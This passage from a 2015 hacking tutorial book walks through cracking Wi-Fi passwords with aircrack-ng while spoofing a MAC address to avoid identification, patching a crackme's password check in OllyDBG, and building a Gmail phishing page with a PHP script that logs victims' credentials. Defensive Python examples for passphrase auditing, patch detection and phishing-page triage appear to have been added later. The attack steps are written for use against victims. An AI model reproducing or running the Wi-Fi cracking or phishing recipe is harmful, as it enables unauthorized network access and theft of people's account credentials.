WPA2 TESTING - Hack-X-Crypt A Straight Forward Guide Towards Ethical Hacking And Cyber Security (2015)




After performing the SQL injection, I can bet that you now have endless curiosity to explore more about ethical hacking. So, according to your need, in this article we are going to perform a hardcore hack using Backtrack Linux: we are going to learn how to crack Wi-Fi using Backtrack. One more thing I want to add here is that all the stuff I am sharing with you is only for study purposes. If you have black intentions, just leave the book now. If you perform this article on your computer, you will be responsible for any damage you cause.

So let’s start the article:

Now let us start with Wi-Fi cracking. But before starting the tutorial, let me give you a small introduction to what Wi-Fi hacking is and what the security protocols associated with it are.

In a secured wireless connection, the data on the internet is sent via encrypted packets. These packets are secured with network keys. There are basically 2 types of security keys:

WEP (Wireless Encryption Protocol): This is the most basic form of encryption. It has become an unsafe option as it is vulnerable and can be cracked with relative ease. Although this is the case, many people still use this encryption.
WPA (Wi-Fi Protected Access): This is the most secure wireless encryption. Cracking such a network requires the use of a wordlist of common passwords; this is a sort of brute-force attack. It is virtually uncrackable if the network is secured with a strong password.

So let's begin the actual Wi-Fi hacking tutorial! In order to crack a Wi-Fi password, you require the following things:

For Wi-Fi hacking you need to install Backtrack on your computer.

I am assuming that you have already installed Backtrack on your PC. If not, it is very easy to install by making a bootable live CD/DVD. For the installation process you can just Google it; you will find it easily.

Now open the console from the taskbar: click on the icon next to the dragon-like icon in the taskbar in the above screenshot.
You will have a command-prompt-like shell called the console terminal.

1) Let's start by putting our wireless adapter in monitor mode. It allows us to see all of the wireless traffic that passes by us in the air. Type airmon-ng in the console terminal and press Enter. You will have a screen like this; note down the name of the interface, in this case wlan0.

2) Now type ifconfig wlan0 down and hit Enter.

This command will disable your wireless adapter; we are doing this in order to change your MAC address.

Now you need to hide your identity so that you will not be identified by the victim. To do this, type ifconfig wlan0 hw ether 00:11:22:33:44:55 and hit Enter.

This command will change your MAC address to 00:11:22:33:44:55.
3) Next, type airmon-ng start wlan0 and press Enter.

This will start the wireless adapter in monitor mode. Note down the new interface name; it could be eth0 or mon0 or something like that.

The above command in the console has started your network adapter in monitor mode as mon0:

4) Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.

This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID).
Let's do this by typing:

airodump-ng mon0

In the above screenshot there is a list of available networks. Choose one network and note its BSSID and channel.
5) Type airodump-ng -c channel no --bssid BSSIDN1 mon0 -w filename and hit Enter.

Replace channel no. and BSSIDN1 with the data from step 4. Replace mon0 with the network interface name from step 3. In place of filename write any name, and remember it. Better to use filename itself.

This command will begin capturing packets from the network. You need to capture more and more packets in order to crack the Wi-Fi password. This packet capturing is a slow process.

6) To make the packet capturing faster, we will use another command. Open a new shell; don't close the previous one. In the new shell type aireplay-ng -1 0 -a BSSIDN1 -h 00:11:22:33:44:55 mon0 and hit Enter.

Replace BSSIDN1 with the data from step 4 and mon0 with the interface name from step 3. This command will boost the data capturing process.
The -1 tells the program the specific attack we wish to use, which in this case is fake authentication with the access point. The 0 is the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapter's MAC address, and the command ends with your wireless adapter's device name.

7) Now wait a few minutes and let the DATA count in the other console reach 5000.

8) After it reaches 5000, open another console and type aircrack-ng filename-01.cap and hit Enter.
Replace filename with the name you used in step 5 and add -01.cap to it; .cap is the extension of the file holding the captured data packets. After typing this command, aircrack will start trying to crack the Wi-Fi password. If the encryption used is WEP, it will surely crack the password within a few minutes.

In the case of WPA, use the following command instead of the above: aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b BSSIDN1 filename-01.cap

Replace BSSIDN1 and filename with the data you used. /pentest/wireless/aircrack-ng/test/password.lst is the path of a file holding a wordlist of popular passwords. In the case of WPA, aircrack will try to brute-force the password. As I explained above, to crack WPA you need a file of passwords to crack the encryption. If you are lucky enough and the network owner is not smart enough, you will get the password.
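Why the wordlist step for WPA is slow, and why a strong passphrase stops it: the passphrase is not the key. Below is an added example, not from the book, that derives the WPA/WPA2 Pairwise Master Key the way the access point itself does and runs a network owner's pre-check on a candidate passphrase; the small wordlist inside it is constructed, standing in for password.lst.

```python
import hashlib

# Constructed mini wordlist standing in for the password.lst file named in the text.
COMMON_PASSPHRASES = ["password", "12345678", "qwertyuiop", "iloveyou", "letmein"]

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit Pairwise Master Key exactly as WPA/WPA2-PSK stations do
    (IEEE 802.11i: PBKDF2-HMAC-SHA1, salt = SSID, 4096 rounds). Every wordlist
    candidate has to go through this, which is what makes the attack slow, and
    the SSID salt means a table computed for one network is useless for another."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA passphrase is 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)

def audit_passphrase(passphrase: str, wordlist=COMMON_PASSPHRASES) -> list:
    """Network owner's check: list the reasons this passphrase would fall to the
    wordlist attack described above (empty list = nothing found)."""
    if len(passphrase) < 8:
        return ["shorter than 8 characters: not even a valid WPA passphrase"]
    findings = []
    # Normalise the way wordlist mangling rules do: lower-case, drop trailing digits/symbols.
    core = passphrase.lower().rstrip("0123456789!@#$%^&*")
    if passphrase.lower() in wordlist or core in wordlist:
        findings.append("passphrase (or its stem) is in the common-password list")
    if len(passphrase) < 12:
        findings.append("fewer than 12 characters: length is the cheapest defence, use more")
    has = [any(c.islower() for c in passphrase), any(c.isupper() for c in passphrase),
           any(c.isdigit() for c in passphrase), any(not c.isalnum() for c in passphrase)]
    if sum(has) < 3:
        findings.append("fewer than 3 character classes: small keyspace per character")
    return findings
```

The vector passphrase "password" with SSID "IEEE" is the published 802.11i test case, so wpa_pmk can be checked against it before trusting the rest.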

For the prevention from being hacked you can refer to the chapter



Nowadays people expect more from an application than what the developers provide. People want to use that specific application according to their own preferences. So now we are here with an article on the topic of reverse engineering. Let's start with simple engineering: "simple engineering" is the task of developing/building something, BUT reverse engineering refers to the task of redeveloping/rebuilding something. In simple words, reverse engineering is the task of modifying the source code of the application to make it work our way. Reverse engineering is a very complicated topic and is very difficult for beginners to understand, as it requires prior knowledge of assembly language.

Developing is easy, but redeveloping is not! Because during development a programmer has to deal with functions, pointers, conditions, loops, etc., but during the decompilation process we need to deal with registers!

Generally 32-bit / 64-bit Windows supports mainly 9 registers:

· Performing Registers
> EAX : Extended Accumulator Register
> EBX : Base Register
> ECX : Counter Register
> EDX : Data Register

· Index
> ESI : Source Index
> EDI : Destination Index

· Pointer
> EBP : Base Pointer
> ESP : Stack Pointer
> EIP : Instruction Pointer
So, let's move towards our way: "How to modify the applications".
The general requirements you need for the modification are listed below and are easily available on the internet:

1. OllyDBG
2. Crack Me App (register and activate your account before download)

· When you have downloaded both apps, first of all launch the Crack Me App.
· It will ask you to enter the password; enter any password you want and hit "OK".

· Now it will show you the error "You are not authorized to use the application".

· Now open OllyDBG and open the Crack Me app in it.
· When you have opened the Crack Me app in OllyDBG, in the upper left box, while scrolling up you will find a statement like this: JE SHORT Password.00457728

· Basically, this is a conditional jump, which means that if the condition is true it will jump to 00457728, which shows us the message "You are not authorized to use the application", and if the condition is not true it just continues reading the code. So we don't need this jump to work, as we don't want to get the error message.

· Now, to remove the error message, we can change JE SHORT Password.00457728 to JNE SHORT Password.00457728. JNE (Jump If Not Equal) means that if the password is correct it will give you the error message and if the password is incorrect it will give you the correct message.

· To change the instruction, just double-click the line JE SHORT Password.00457728, simply change it to JNE SHORT Password.00457728 and hit "Assemble".

· Now hit the blue "PLAY" button at the top of OllyDBG to start the Crack Me app again; enter the password and it will give you the correct message.
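The defender's counterpart to the JE/JNE patch above is an integrity check. The following is an added example, not from the book or the Crack Me app, that diffs a known-good code section against a suspect copy and reports every single-byte flip of one short conditional jump into another, together with the jump target. The sample code bytes and the 0x401000 base address are constructed.

```python
# Opcode bytes of the x86 short conditional jumps (0x70..0x7F); each is followed
# by one signed 8-bit displacement. The JE SHORT / JNE SHORT pair in the text
# differs by exactly one byte: 0x74 versus 0x75.
SHORT_JCC = {0x70: "JO", 0x71: "JNO", 0x72: "JB", 0x73: "JNB", 0x74: "JE",
             0x75: "JNE", 0x76: "JBE", 0x77: "JA", 0x78: "JS", 0x79: "JNS",
             0x7A: "JP", 0x7B: "JNP", 0x7C: "JL", 0x7D: "JGE", 0x7E: "JLE", 0x7F: "JG"}

def find_flipped_jumps(original: bytes, patched: bytes, base: int = 0) -> list:
    """Compare a known-good code section with a suspect copy and report every
    single-byte change that turns one short conditional jump into another.
    Returns (address, old mnemonic, new mnemonic, jump target) tuples.
    Caveat: data bytes can collide with these opcodes, so treat a hit as a lead
    to confirm in a disassembler, not as proof of tampering."""
    if len(original) != len(patched):
        raise ValueError("sections differ in size; not an in-place byte patch")
    hits = []
    for off, (a, b) in enumerate(zip(original, patched)):
        if a != b and a in SHORT_JCC and b in SHORT_JCC and off + 1 < len(patched):
            disp = patched[off + 1]
            disp = disp - 256 if disp > 127 else disp   # sign-extend the rel8
            target = base + off + 2 + disp              # relative to the next instruction
            hits.append((base + off, SHORT_JCC[a], SHORT_JCC[b], target))
    return hits

# Constructed sample: cmp eax, ebx / je +5 / mov eax, 1 / ret, and the same
# bytes after the one-byte JE -> JNE patch the tutorial applies.
GOOD = bytes.fromhex("3bc3" "7405" "b801000000" "c3")
PATCHED = bytes.fromhex("3bc3" "7505" "b801000000" "c3")
```

A real deployment compares the shipped binary's code section against the build you signed; a hash mismatch tells you something changed, this tells you what.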



What is phishing?

Phishing is an attempt by the sender of an email to have the receiver release their personal information, i.e. the attacker lures the victim into giving up confidential information.

Why phishing?

There are many password cracking tools coming into and going out of the market. But phishing is the most efficient method to steal confidential information like passwords, credit card numbers, bank account numbers, etc.

How does phishing work?

It works just like normal fishing.
A fisherman generally throws bait into the water to lure the fish. Then a fish comes to take the food, feeling that it is legitimate. When it bites the bait, it is caught by the hook. Now the fisherman pulls out the fish.

In the same way, the hacker sends a fake login page to the victim. The victim thinks that it is a legitimate one and enters his confidential information. Now the data is with the hacker.
Now, let's learn how to hack by phishing:
I am selecting a Gmail account to be hacked by phishing.

For phishing you need the following stuff:
· First of all, open gmail.com in your browser and, when the page has loaded completely, right-click on the page; a menu opens with the option "view page source" in it.
· Click on the "view page source" option and you will see the source code of that page open in front of you.
· Then press Ctrl+F to open the text/word find box.
· Type "action=" and replace its value with anything.php,
such as "action=mail.php".
· Then find "method=" and replace its value with "get", such as method="get".

· Then save the file as anything.html, such as "Gmail.html".
· Then create a blank notepad file "log.txt".
· Then open notepad again and type the following code:

<?php
header("Location: http://www.Gmail.com");
$handle = fopen("log.txt", "a");
// one "field=value" line per submitted form field
foreach ($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
// blank line between submissions
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

· And save it as "mail.php" (save this file under the same name you used for "action=").
· Now finally you have the three files which are required for the phishing:
· 1) Gmail.html (fake login page)
· 2) mail.php (to capture the login details)
· 3) log.txt (to store the captured details)

Step 1: Create an account on any free web hosting site like www.bythost.com.

Step 2: Now upload all three files. (I have taken www.my3gb.com.)
Step 3: Give the link of the fake page to your victim.

e.g. www.yoursitename.my3gb.com/Gmail.html
Step 4: When he clicks the link, it opens a fake Gmail page where he enters his login details. When he clicks the sign-in button, his login details will be stored in the log.txt file.
Here I have uploaded my scripts to www.my3gb.com and copied the Gmail.html link which you have to send to the victim. I clicked the Gmail.html link and a fake page opened where I entered my login details.

This page looks exactly like the original Gmail login page, and the victim enters his/her login details to log in to his/her account.
Now, this time, the victim will be redirected to the original Gmail login website.
The victim will not even know that his/her account got hacked. The victim will think that the page reloaded due to internet errors or login mistakes, etc.

Now his/her login details have been captured by the PHP script and stored in the log.txt file as shown in the figure below:

In the same way you can hack FACEBOOK accounts and other social networking accounts.
How to protect ourselves from phishing?
· Don't use links
· Be suspicious of any e-mail with urgent requests
· Use secured websites
· Use efficient browsers
· Use antivirus or internet security software.
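Two of the edits the recipe above makes (the form action pointed at mail.php and the method switched to "get") are visible in the page source, so a suspected phishing page can be checked for them. The following is an added example, not from the book, that parses a page's forms and flags both; the sample page, its URL and the expected host mail.example.com are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FormCollector(HTMLParser):
    """Record each <form>'s action, method and whether it holds a password field."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # HTMLParser lower-cases attribute names
        if tag == "form":
            self._cur = {"action": a.get("action", ""),
                         "method": (a.get("method") or "get").lower(),
                         "has_password": False}
        elif tag == "input" and self._cur is not None and a.get("type", "").lower() == "password":
            self._cur["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._cur is not None:
            self.forms.append(self._cur)
            self._cur = None

def audit_login_forms(html: str, page_url: str, legit_host: str) -> list:
    """Triage a suspected phishing page. legit_host is where the genuine service's
    login form submits (assumed known to the analyst). Returns findings; [] = clean."""
    p = FormCollector()
    p.feed(html)
    findings = []
    for f in p.forms:
        if not f["has_password"]:
            continue                                 # not a login form, skip
        submit_host = urlparse(urljoin(page_url, f["action"])).netloc.lower()
        if submit_host != legit_host.lower():
            findings.append(f"password form submits to {submit_host}, not {legit_host}")
        if f["method"] == "get":
            findings.append("password form uses method=get: credentials end up in the URL and server logs")
    return findings

# Constructed sample modelled on the tutorial's edited page (hosts are placeholders).
FAKE_PAGE = """<form action="mail.php" method="get">
<input type="text" name="user"><input type="password" name="pass">
<input type="submit" value="Sign in"></form>"""
```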